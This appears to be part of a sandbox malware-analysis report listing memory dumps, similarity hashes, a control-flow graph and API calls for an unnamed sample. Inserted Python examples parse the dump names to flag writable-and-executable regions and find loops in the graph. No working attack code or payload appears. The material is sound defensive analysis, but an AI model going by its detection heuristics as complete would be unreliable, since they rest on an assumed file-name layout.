• Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
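The dump names in the list above carry, per memory region, a base address and two values that look like Windows memory-protection and region-type constants. The following Python is an added example, not part of the Joe Sandbox report or its tooling, that parses those names and picks out image-backed regions that are writable and executable at the same time, which is where unpacked or self-modified code tends to live. The dot-separated field layout is an assumption inferred from the names on this page; the page does not document it. Only the base-address, protection and type fields are decoded, on the basis that the values seen here (0x04, 0x40, 0x80 and 0x01000000) coincide with the Windows PAGE_READWRITE, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY and MEM_IMAGE constants; the remaining fields are carried through undecoded. The sample names are copied from this report's lists.

```python
"""Decode .sdmp memory-dump names as they appear in the report and flag
image regions that are writable and executable at once.

ASSUMPTION (not documented on the page): the dot-separated layout is
  f0.f1.f2.<base address>.<protection>.f5.<region type>.f7.sdmp
Only <base address>, <protection> and <region type> are decoded; the values
seen in the report (0x04, 0x40, 0x80 and 0x01000000) match the Windows
PAGE_READWRITE, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY and MEM_IMAGE
constants, which is the basis for that decoding. f0, f1, f2, f5, f7 are kept
as opaque strings.
"""
import re

# Windows memory-protection constants (winnt.h); the low byte is the base protection.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80
# MEMORY_BASIC_INFORMATION.Type values.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

HEX8 = r"[0-9A-Fa-f]{8}"
SDMP_RE = re.compile(
    rf"^(?P<f0>{HEX8})\.(?P<f1>{HEX8})\.(?P<f2>\d+)\.(?P<base>[0-9A-Fa-f]{{16}})\."
    rf"(?P<protect>{HEX8})\.(?P<f5>{HEX8})\.(?P<type>{HEX8})\.(?P<f7>{HEX8})\.sdmp$"
)

# Constructed sample input: names copied from the report's "Associated" lists.
SAMPLE_NAMES = [
    "00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmp",
]


def decode_protect(value):
    """Render a PAGE_* value as 'BASE|MODIFIER|...' (e.g. 0x104 -> PAGE_READWRITE|PAGE_GUARD)."""
    base = value & 0xFF
    names = [PAGE_PROTECT.get(base, f"0x{base:02x}")]
    names += [name for bit, name in PAGE_MODIFIERS.items() if value & bit]
    return "|".join(names)


def parse_sdmp_name(name):
    """Split one .sdmp name into its fields; raise ValueError if it does not fit the assumed layout."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not an .sdmp name in the assumed layout: {name!r}")
    protect = int(m["protect"], 16)
    region_type = int(m["type"], 16)
    return {
        "raw": name,
        "opaque": (m["f0"], m["f1"], m["f2"], m["f5"], m["f7"]),
        "base": int(m["base"], 16),
        "protect": protect,
        "protect_name": decode_protect(protect),
        "type": region_type,
        "type_name": MEM_TYPE.get(region_type, f"0x{region_type:x}"),
        "writable": bool(protect & WRITE_MASK),
        "executable": bool(protect & EXEC_MASK),
    }


def suspicious_regions(names):
    """Image-backed regions that are writable *and* executable.

    A normally linked PE maps code read-execute and data read-write, so W+X
    inside a MEM_IMAGE region (PAGE_EXECUTE_WRITECOPY from the section header,
    or PAGE_EXECUTE_READWRITE after a runtime protection change) is the first
    place to look for unpacked code.
    """
    regions = (parse_sdmp_name(n) for n in names)
    return [r for r in regions if r["type"] == 0x1000000 and r["writable"] and r["executable"]]


if __name__ == "__main__":
    for r in suspicious_regions(SAMPLE_NAMES):
        print(f"{r['base']:#010x}  {r['type_name']:9}  {r['protect_name']}")
```

Run as a script it prints the three W+X image regions from the sample; parse_sdmp_name() raises ValueError for a name that does not match the assumed layout rather than guessing at it.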
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID: InfoNativeSystem
• String ID:
• API String ID: 1721193555-0
• Opcode ID: bb70bf1384740da285a018fab91cd7720094c6d86a71d12d49e080b121c9d4b9
• Instruction ID: 23725398ebae966e8ade7a2ad18f3a97d97ffd23564a69dc0eb996b3b7e9114a
• Opcode Fuzzy Hash: bb70bf1384740da285a018fab91cd7720094c6d86a71d12d49e080b121c9d4b9
• Instruction Fuzzy Hash: 71E1E370E006449BDB24BB68CC1B3DE7A62AB41725F94469CEC196B3C3DB355F8887C2

Control-flow Graph

Basic blocks (id: address range, call target where the graph labels one), in address order:
• 860: 8d82f-8d83a
• 862: 8d83c-8d846
• 861: 8d848-8d84e
• 864: 8d850-8d851
• 867: 8d853-8d85a, call 89dc0
• 873: 8d85c-8d865, call 88e36
• 865: 8d867-8d878, RtlAllocateHeap
• 866: 8d87a
• 863: 8d87c-8d887, call 875f6
• 871: 8d889-8d88b
Edges:
• 860 -> 861, 862
• 861 -> 864, 865
• 862 -> 861, 863
• 863 -> 871
• 864 -> 865
• 865 -> 866, 867
• 866 -> 871
• 867 -> 863, 873
• 873 -> 863, 865
APIs
• RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0008A813,00000001,00000364,00000006,000000FF,?,0008EE3F,?,00000004,00000000,?,?), ref: 0008D871
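The control-flow graph above reaches the text of the report only as a flattened token stream. The following Python is an added example, not report tooling, that parses that stream back into basic blocks and edges, then finds loop back-edges with a depth-first search and recovers the natural loop for each one. On this function it identifies a single cycle, 865 -> 867 -> 873 -> 865: the block that calls RtlAllocateHeap and the two blocks calling 89dc0 and 88e36 form a loop, so the allocation is retried along that path. The token grammar (node id, address range, optional label words; `a->b` edges) is inferred from the text on this page, and the input string is copied from the graph above.

```python
"""Rebuild the control-flow graph from the flattened text in the report and
find its loops.

Token grammar (inferred from the text on this page):
  <id> <start>[-<end>] [label words ...]   one basic block
  <src>-><dst>                             one edge
Labels are either an API name ("RtlAllocateHeap") or "call <addr>" for an
internal call, exactly as the report prints them.
"""
import re
from collections import defaultdict

# Constructed input: the graph string copied from the report (function at 8d82f).
CFG_TEXT = (
    "860 8d82f-8d83a 861 8d848-8d84e 860->861 862 8d83c-8d846 860->862 "
    "864 8d850-8d851 861->864 865 8d867-8d878 RtlAllocateHeap 861->865 "
    "862->861 863 8d87c-8d887 call 875f6 862->863 871 8d889-8d88b 863->871 "
    "864->865 866 8d87a 865->866 867 8d853-8d85a call 89dc0 865->867 "
    "866->871 867->863 873 8d85c-8d865 call 88e36 867->873 873->863 873->865"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^[0-9a-f]+(-[0-9a-f]+)?$")


def _starts_block(tokens, i):
    """True if tokens[i], tokens[i+1] look like '<id> <start>[-<end>]'."""
    return (
        i + 1 < len(tokens)
        and NODE_ID_RE.match(tokens[i]) is not None
        and ADDR_RE.match(tokens[i + 1]) is not None
    )


def parse_cfg(text):
    """Return (blocks, edges): blocks maps id -> {start, end, label}; edges is a list of (src, dst)."""
    blocks, edges = {}, []
    tokens = text.split()
    i = 0
    while i < len(tokens):
        m = EDGE_RE.match(tokens[i])
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        if not _starts_block(tokens, i):
            raise ValueError(f"unexpected token {tokens[i]!r} at {i}")
        node_id = int(tokens[i])
        lo, _, hi = tokens[i + 1].partition("-")
        start, end = int(lo, 16), int(hi or lo, 16)  # single-address block: start == end
        i += 2
        label = []
        # Label words run until the next edge or the next '<id> <addr>' pair.
        # (A label word made only of digits followed by a hex-looking word would be
        # misread as a new block; the report's labels contain no such pair.)
        while i < len(tokens) and not EDGE_RE.match(tokens[i]) and not _starts_block(tokens, i):
            label.append(tokens[i])
            i += 1
        blocks[node_id] = {"start": start, "end": end, "label": " ".join(label)}
    return blocks, edges


def entry_block(blocks):
    """The block with the lowest start address (the function entry)."""
    return min(blocks, key=lambda n: blocks[n]["start"])


def find_back_edges(edges, entry):
    """Recursive DFS from entry; an edge into a node still on the DFS stack closes a loop."""
    succ = defaultdict(list)
    for s, d in edges:
        succ[s].append(d)
    WHITE, GREY, BLACK = 0, 1, 2
    color = defaultdict(int)
    back = []

    def visit(n):
        color[n] = GREY
        for d in succ[n]:
            if color[d] == GREY:
                back.append((n, d))
            elif color[d] == WHITE:
                visit(d)
        color[n] = BLACK

    visit(entry)
    return back


def natural_loop(edges, back_edge):
    """Header plus every node that reaches the back-edge tail without passing through the header."""
    tail, header = back_edge
    pred = defaultdict(list)
    for s, d in edges:
        pred[d].append(s)
    loop, stack = {header, tail}, [tail]
    while stack:
        for p in pred[stack.pop()]:
            if p not in loop:
                loop.add(p)
                stack.append(p)
    return loop


def describe(blocks, node_ids):
    """Human-readable lines, in address order, for a set of block ids."""
    out = []
    for n in sorted(node_ids, key=lambda n: blocks[n]["start"]):
        b = blocks[n]
        rng = f"{b['start']:x}" if b["start"] == b["end"] else f"{b['start']:x}-{b['end']:x}"
        out.append(f"{n}: {rng} {b['label']}".rstrip())
    return out


if __name__ == "__main__":
    blocks, edges = parse_cfg(CFG_TEXT)
    entry = entry_block(blocks)
    print(f"{len(blocks)} blocks, {len(edges)} edges, entry block {entry} @ {blocks[entry]['start']:x}")
    for be in find_back_edges(edges, entry):
        print(f"loop via back-edge {be[0]}->{be[1]}:")
        for line in describe(blocks, natural_loop(edges, be)):
            print("  " + line)
```

The same parser works for any other control-flow graph text in this report; only CFG_TEXT changes. The natural-loop computation walks predecessors backwards from the back-edge tail, which is what makes it stop at the header and exclude the exit blocks 863 and 871.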
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 0edf8a71e0f4a22ebdd92bef84a614770f4546cf5bc78fc405d7ed8585732abf
• Instruction ID: d84be49dbfffbe752c39ad31350af68b24b7cfec4d2f5d6099edd3b61bee9320
• Opcode Fuzzy Hash: 0edf8a71e0f4a22ebdd92bef84a614770f4546cf5bc78fc405d7ed8585732abf
• Instruction Fuzzy Hash: 0AF08931505625E6EB717B769C05A9B7799FF55770F298323ED88971C1DE20DC0087E0
APIs
• GetFileAttributesA.KERNEL32(?,0005DA1D,?,?,?,?), ref: 000587B9
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 3a00b62d3b94cdadb173a0fdb412f9bf5312ed77dc19a95b45896f9332440112
• Instruction ID: c972a7d760b482c18964e0896d8950c8a80ec2eb9d837792ea240f66a973be22
• Opcode Fuzzy Hash: 3a00b62d3b94cdadb173a0fdb412f9bf5312ed77dc19a95b45896f9332440112
• Instruction Fuzzy Hash: 0AC08C2801960406FD1C053C00898AB33854B4F7AB3F45F94EC74AF2E1DA75EC4F9360
APIs
• GetFileAttributesA.KERNEL32(?,0005DA1D,?,?,?,?), ref: 000587B9
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 71bd7500e628be7473bd624a476ac4810d326b2bcd610cc4930d28fc81d5e314
• Instruction ID: 9cb5010862af1c6688dd120d849effcd2685bac0352f34cc57fbcfe8a5b1b959
• Opcode Fuzzy Hash: 71bd7500e628be7473bd624a476ac4810d326b2bcd610cc4930d28fc81d5e314
• Instruction Fuzzy Hash: CBC08C3801920446FA1C4A3C508882732859B0B72B3F04FA8EC31AF2E1DBB2D84BC7A0
APIs
• CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0005B3C7
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                                                                • Opcode ID: b86c4f9edc59192988329f11f102bea49876e2d6e38e593f1eaf32cf0f1590be
                                                                                                                                                                                                                                • Instruction ID: a72ebcdfa8ca3628ebc51bfe2adfd66c9c5bbb1ffdef4d88c9be39b4571d1c64
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b86c4f9edc59192988329f11f102bea49876e2d6e38e593f1eaf32cf0f1590be
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70B11870A10268DFEB29CF14CC98BDEB7B5EF15304F5085D9E80967281D775AA88CF91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1770090191.00000000048A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_48a0000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7e2dbbd480d547846ef10f032d10b2a117a64587b0c8fab180ca8499ca5332e9
                                                                                                                                                                                                                                • Instruction ID: cbea0124d9fd8163f0d8f3f343d133d7adc2d52f55b7470ab16dcb030022548e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e2dbbd480d547846ef10f032d10b2a117a64587b0c8fab180ca8499ca5332e9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E31C0E724D118BE71428D851B54AB66B6EF6DB6383308F26F407CA542F2D43A7A7132
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1770090191.00000000048A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_48a0000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
